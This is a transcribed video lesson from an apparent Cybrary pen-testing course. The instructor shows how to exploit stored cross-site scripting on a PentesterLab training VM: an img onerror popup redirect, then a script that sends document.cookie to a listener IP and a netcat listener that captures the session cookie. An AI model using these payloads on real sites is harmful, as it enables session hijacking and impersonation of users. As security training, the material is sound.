Part 9 - Exploiting XSS

Video Activity

This video covers exploiting cross site scripting and covers how to exploit XSS manually via redirection and cookie theft as well as how to exploit XSS with BEEF.

Join over 3 million cybersecurity professionals advancing their career
Sign up with
Required fields are marked with an *
or

Already have an account? Sign In »

Time
4 hours 20 minutes
Difficulty
Intermediate
CEU/CPE
5
Video Description

This video covers exploiting cross site scripting and covers how to exploit XSS manually via redirection and cookie theft as well as how to exploit XSS with BEEF.

Video Transcription
00:03
>> Welcome to Cybrary. I'm Raymond Evans,
00:03
and I will be your subject matter expert for
00:03
Cybrary with that pen-testing course.
00:03
In this video, we will be discussing
00:03
exploiting cross-site scripting.
00:03
What will be covered?
00:03
We're going to talk about how to exploit
00:03
cross-site scripting manually,
00:03
using redirection and cookie theft,
00:03
and then how to exploit cross-site scripting with BEEF.
00:03
How did we exploit cross-site scripting manually?
00:03
The same technique that's
00:03
used to identify cross-site scripting,
00:03
could also be used to exploit it.
00:03
Except some additional steps need to be taken.
00:03
First, we have to decide what
00:03
>> attack we want to perform.
00:03
>> Do we want to redirect the user to a malicious site,
00:03
or do we want to steal data from them?
00:03
Next, we are going to
00:03
cover cross-site scripting redirection.
00:03
First, we're going to cover
00:03
cross-site scripting redirection
00:03
but first, you're going to need an additional VM.
00:03
You're going to need the cross-scripting VM
00:03
from PentesterLab.
00:03
Go to PENTESTERLAB.COM/EXERCISES/XSS_AND_MYSQL_FILE.
00:03
That is the VM that we will be using for this one.
00:03
How do we exploit cross-site scripting
00:03
manually to attempt redirection?
00:03
Well, below is a line of code that can be used to
00:03
cause an unwanted popup on a vulnerable pull website.
00:03
Here in this code,
00:03
we see it's called an image source,
00:03
example.com onerror, window.open,
00:03
google.com,
00:03
XSS, height, width, so that onerror=window.open.
00:03
That URL that you put in there,
00:03
is going to be the URL that it's trying to call.
00:03
It's going to have a height and width of 500 by 500.
00:03
Let's go check that out.
00:03
>> Here we are in our environment.
00:03
>> We want to get somebody who's
00:03
viewing this blog to get redirected,
00:03
or at least have a popup come up.
00:03
What we're going to do is we're going to come in here,
00:03
and we're going to leave a comment.
00:03
Let's call that title test,
00:03
and we're going to leave it by a non.
00:03
[NOISE] Here in the text field,
00:03
we're going to put our script in here
00:03
and see if it works.
00:03
Now, look at that. Iceweasel prevented
00:03
a site from opening a pop-up window,
00:03
and this is why it's good to have
00:03
pop-up blockers turned on
00:03
but for the purposes of this class,
00:03
we're going to allow the pop-up blockers
00:03
right now so you can check it out.
00:03
We're going to refresh the page here because
00:03
the attack is already on the page,
00:03
it's stored on there right now.
00:03
We're going to refresh and look at that.
00:03
We have a pop-up.
00:03
Now, if this is connected to the Internet,
00:03
it would have connected to google.com.
00:03
However, it was not, so it did not connect.
00:03
Now, the reason why this worked like it did,
00:03
was because it's trying to pull
00:03
an image source from this website,
00:03
but it gives an error
00:03
trying to pull it from that website.
00:03
Then on that error,
00:03
it opens up a window and tries to go to google.com.
00:03
Now, you can redirect somebody but we
00:03
showed you before that
00:03
your cookie won't always show up in that alert box,
00:03
we showed you that in the last video.
00:03
If you are to try to pull the cookie and the pop-up,
00:03
in this environment, I will do the same exact thing.
00:03
You're not going to get
00:03
that document to populate in that pop-up.
00:03
However, you can't separate
00:03
listener to try to get that cookie roll back to you.
00:03
Let's break this line down a bit here that we got.
00:03
We have script, new image.source,
00:03
and so it calls out to the listener's IPM port.
00:03
When it calls out to it,
00:03
it's going to send the document.cookie to that port.
00:03
The script is enclose
00:03
the state and encloses this content as a script.
00:03
A new image source.
00:03
It identifies a server to
00:03
communicate with, it saying, hey,
00:03
we're going to pull a new image from this source,
00:03
and then LISTENER IP: AND PORT/B.PHP"+DOCUMENT.COOKIE.
00:03
This portion identifies the server the script will
00:03
communicate with and will send
00:03
the cookies to that communicator.
00:03
Here's an example how
00:03
this has been used on a known vulnerable field.
00:03
We will have script, new image source,
00:03
HTTP, the IP address of the attacker port.
00:03
Whatever the port is that
00:03
the attackers will sign online/B.PHP.
00:03
How did we get the data back from this attack?
00:03
Well, in order to do that,
00:03
we're going to have to set up a listener.
00:03
We need a listener.
00:03
In your terminal type Netcat tec lvp 80.
00:03
L tells Netcat to listen.
00:03
V tells Netcat to
00:03
verbosely print out information received.
00:03
P designates the port to use.
00:03
Let's go set that up real quick.
00:03
[NOISE] Here we are in our environment.
00:03
I'm going to type Netcat tech lvp 80.
00:03
Now Netcat is listening on port 80.
00:03
Next, we're going to put our script that we
00:03
want to use onto the vulnerable web page.
00:03
Here we are on our vulnerable section of
00:03
the page and we have script,
00:03
new image source,
00:03
and we have our IP address here and port 80.
00:03
We have our Netcat listener already set up.
00:03
Let's submit the query and see what happens.
00:03
Well, we are popup because
00:03
>> that's stored from last time.
00:03
>> Let's just close out there.
00:03
I see a pen test, so I'll just still work in here.
00:03
Let's come over here to our listener, and look at that.
00:03
We got some information back.
00:03
Pen test labs is connected to us.
00:03
Say get request, the host.
00:03
We see the user agents,
00:03
so we see what they're coming from.
00:03
Accept, accept, accept.
00:03
We're still missing some information here.
00:03
I thought it like continue working
00:03
here and see if it sends us that nice cookie back.
00:03
[NOISE] Let's try refreshing the page here.
00:03
[NOISE]
00:03
Re-initiate our listener and there we go.
00:03
Now we refresh the page.
00:03
We got the cookie from the active user.
00:03
Now this cookie here can be used
00:03
to imitate the individual on the web page.
00:03
If that person was to be logged in
00:03
at the time as the admin or as
00:03
somebody else this cookie
00:03
here can be used to imitate them,
00:03
which is very dangerous.
00:03
There's something that had sensitive data on it.
00:03
If there's a website that has sensitive data on it,
00:03
and it was vulnerable to cross-site scripting,
00:03
an attack like this could be
00:03
used to steal a cookie that can
00:03
imitate an individual to get access into the website.
Up Next